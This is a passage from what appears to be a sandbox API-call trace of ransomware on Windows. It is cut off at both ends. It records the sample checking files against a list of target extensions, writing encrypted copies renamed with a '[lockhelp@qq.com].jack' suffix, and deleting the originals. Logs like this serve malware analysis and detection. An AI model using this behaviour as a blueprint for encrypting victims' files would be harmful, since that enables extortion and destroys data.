lpNumberOfBytesWritten=0x37dfc94*=0xfc, lpOverlapped=0x0) returned 1 [0201.315] SetEndOfFile (hFile=0x424) returned 1 [0201.315] CloseHandle (hObject=0x424) returned 1 [0201.316] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.316] SetEndOfFile (hFile=0x3ec) returned 1 [0201.317] CloseHandle (hObject=0x3ec) returned 1 [0201.317] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.318] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif")) returned 1 [0201.318] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.318] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.318] lstrlenW (lpString=".doc") returned 4 [0201.318] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.318] lstrlenW (lpString=".docx") returned 5 [0201.318] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0201.318] lstrlenW (lpString=".pdf") returned 4 [0201.318] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.318] lstrlenW (lpString=".xls") returned 4 [0201.318] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.318] lstrlenW (lpString=".xlsx") returned 5 [0201.318] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0201.318] lstrlenW (lpString=".ppt") returned 4 [0201.318] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.318] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.318] lstrlenW (lpString=".zip") returned 4 [0201.318] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.318] lstrlenW (lpString=".rar") returned 4 [0201.318] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.319] lstrlenW (lpString=".bz2") returned 4 [0201.319] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.319] lstrlenW (lpString=".7z") returned 3 [0201.319] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.319] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.319] lstrlenW (lpString=".dbf") returned 4 [0201.319] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.319] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.319] lstrlenW (lpString=".1cd") returned 4 [0201.319] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.319] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.319] lstrlenW (lpString=".jpg") returned 4 [0201.319] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.319] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.319] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.319] lstrlenW (lpString=".doc") returned 4 [0201.319] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.319] lstrlenW (lpString=".docx") returned 5 [0201.319] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0201.319] lstrlenW (lpString=".pdf") returned 4 [0201.319] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.319] lstrlenW (lpString=".xls") returned 4 [0201.319] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.319] lstrlenW (lpString=".xlsx") returned 5 [0201.319] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0201.319] lstrlenW (lpString=".ppt") returned 4 [0201.319] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.319] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.319] lstrlenW (lpString=".zip") returned 4 [0201.320] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.320] lstrlenW (lpString=".rar") returned 4 [0201.320] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.320] lstrlenW (lpString=".bz2") returned 4 [0201.320] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.320] lstrlenW (lpString=".7z") returned 3 [0201.320] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.320] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.320] lstrlenW (lpString=".dbf") returned 4 [0201.320] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.320] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.320] lstrlenW (lpString=".1cd") returned 4 [0201.320] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.320] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0201.320] lstrlenW (lpString=".jpg") returned 4 [0201.320] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.320] lstrcmpiW (lpString1=".gif", lpString2=".jack") returned -1 [0201.320] lstrlenW (lpString="invalid32x32.gif") returned 16 [0201.320] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0201.321] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=153) returned 1 [0201.321] CloseHandle (hObject=0x3ec) returned 1 [0201.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif")) returned 0x20 [0201.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.322] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0201.322] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.322] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.322] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0201.322] GetLastError () returned 0x0 [0201.322] ReadFile (in: hFile=0x3ec, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x99, lpOverlapped=0x0) returned 1 [0201.323] WriteFile (in: hFile=0x424, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xa0, lpOverlapped=0x0) returned 1 [0201.324] ReadFile (in: hFile=0x3ec, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.324] WriteFile (in: hFile=0x424, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xf4, lpOverlapped=0x0) returned 1 [0201.324] SetEndOfFile (hFile=0x424) returned 1 [0201.325] CloseHandle (hObject=0x424) returned 1 [0201.325] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.325] SetEndOfFile (hFile=0x3ec) returned 1 [0201.326] CloseHandle (hObject=0x3ec) returned 1 [0201.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.327] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif")) returned 1 [0201.327] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.327] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.327] lstrlenW (lpString=".doc") returned 4 [0201.327] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.327] lstrlenW (lpString=".docx") returned 5 [0201.327] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.328] lstrlenW (lpString=".pdf") returned 4 [0201.328] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.328] lstrlenW (lpString=".xls") returned 4 [0201.328] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.328] lstrlenW (lpString=".xlsx") returned 5 [0201.328] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.328] lstrlenW (lpString=".ppt") returned 4 [0201.328] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.328] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.328] lstrlenW (lpString=".zip") returned 4 [0201.328] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.328] lstrlenW (lpString=".rar") returned 4 [0201.328] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.328] lstrlenW (lpString=".bz2") returned 4 [0201.328] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.328] lstrlenW (lpString=".7z") returned 3 [0201.328] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.328] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.328] lstrlenW (lpString=".dbf") returned 4 [0201.328] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.328] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.328] lstrlenW (lpString=".1cd") returned 4 [0201.328] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.328] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.328] lstrlenW (lpString=".jpg") returned 4 [0201.328] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.328] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.328] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.329] lstrlenW (lpString=".doc") returned 4 [0201.329] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.329] lstrlenW (lpString=".docx") returned 5 [0201.329] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.329] lstrlenW (lpString=".pdf") returned 4 [0201.329] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.329] lstrlenW (lpString=".xls") returned 4 [0201.329] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.329] lstrlenW (lpString=".xlsx") returned 5 [0201.329] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.329] lstrlenW (lpString=".ppt") returned 4 [0201.329] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.329] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.329] lstrlenW (lpString=".zip") returned 4 [0201.329] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.329] lstrlenW (lpString=".rar") returned 4 [0201.329] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.329] lstrlenW (lpString=".bz2") returned 4 [0201.329] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.329] lstrlenW (lpString=".7z") returned 3 [0201.329] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.329] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.329] lstrlenW (lpString=".dbf") returned 4 [0201.329] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.329] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.329] lstrlenW (lpString=".1cd") returned 4 [0201.329] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.329] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0201.329] lstrlenW (lpString=".jpg") returned 4 [0201.329] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.330] lstrcmpiW (lpString1=".gif", lpString2=".jack") returned -1 [0201.330] lstrlenW (lpString="win32_CopyDrop32x32.gif") returned 23 [0201.330] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.347] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=165) returned 1 [0201.347] CloseHandle (hObject=0x3d4) returned 1 [0201.347] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif")) returned 0x20 [0201.347] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.348] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.348] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.348] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.348] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.353] GetLastError () returned 0x0 [0201.353] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xa5, lpOverlapped=0x0) returned 1 [0201.354] WriteFile (in: hFile=0x420, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xb0, lpOverlapped=0x0) returned 1 [0201.355] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.355] WriteFile (in: hFile=0x420, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x102, lpOverlapped=0x0) returned 1 [0201.355] SetEndOfFile (hFile=0x420) returned 1 [0201.355] CloseHandle (hObject=0x420) returned 1 [0201.356] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.356] SetEndOfFile (hFile=0x3d4) returned 1 [0201.357] CloseHandle (hObject=0x3d4) returned 1 [0201.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.358] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif")) returned 1 [0201.358] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.358] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.358] lstrlenW (lpString=".doc") returned 4 [0201.358] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.358] lstrlenW (lpString=".docx") returned 5 [0201.358] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.358] lstrlenW (lpString=".pdf") returned 4 [0201.358] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.358] lstrlenW (lpString=".xls") returned 4 [0201.358] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.358] lstrlenW (lpString=".xlsx") returned 5 [0201.358] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.358] lstrlenW (lpString=".ppt") returned 4 [0201.358] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.358] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.358] lstrlenW (lpString=".zip") returned 4 [0201.358] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.359] lstrlenW (lpString=".rar") returned 4 [0201.359] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.359] lstrlenW (lpString=".bz2") returned 4 [0201.359] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.359] lstrlenW (lpString=".7z") returned 3 [0201.359] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.359] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.359] lstrlenW (lpString=".dbf") returned 4 [0201.359] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.359] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.359] lstrlenW (lpString=".1cd") returned 4 [0201.359] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.359] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.359] lstrlenW (lpString=".jpg") returned 4 [0201.359] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.359] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.359] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.359] lstrlenW (lpString=".doc") returned 4 [0201.359] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.359] lstrlenW (lpString=".docx") returned 5 [0201.359] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.359] lstrlenW (lpString=".pdf") returned 4 [0201.359] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.359] lstrlenW (lpString=".xls") returned 4 [0201.359] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.359] lstrlenW (lpString=".xlsx") returned 5 [0201.359] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.359] lstrlenW (lpString=".ppt") returned 4 [0201.359] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.360] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.360] lstrlenW (lpString=".zip") returned 4 [0201.360] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.360] lstrlenW (lpString=".rar") returned 4 [0201.360] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.360] lstrlenW (lpString=".bz2") returned 4 [0201.360] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.360] lstrlenW (lpString=".7z") returned 3 [0201.360] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.360] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.360] lstrlenW (lpString=".dbf") returned 4 [0201.360] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.360] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.360] lstrlenW (lpString=".1cd") returned 4 [0201.360] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.360] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0201.360] lstrlenW (lpString=".jpg") returned 4 [0201.360] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.360] lstrcmpiW (lpString1=".gif", lpString2=".jack") returned -1 [0201.360] lstrlenW (lpString="win32_LinkNoDrop32x32.gif") returned 25 [0201.360] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0201.369] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=153) returned 1 [0201.369] CloseHandle (hObject=0x3f8) returned 1 [0201.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif")) returned 0x20 [0201.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.369] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0201.369] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.369] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.369] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.370] GetLastError () returned 0x0 [0201.370] ReadFile (in: hFile=0x3f8, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x99, lpOverlapped=0x0) returned 1 [0201.371] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xa0, lpOverlapped=0x0) returned 1 [0201.372] ReadFile (in: hFile=0x3f8, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.373] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x106, 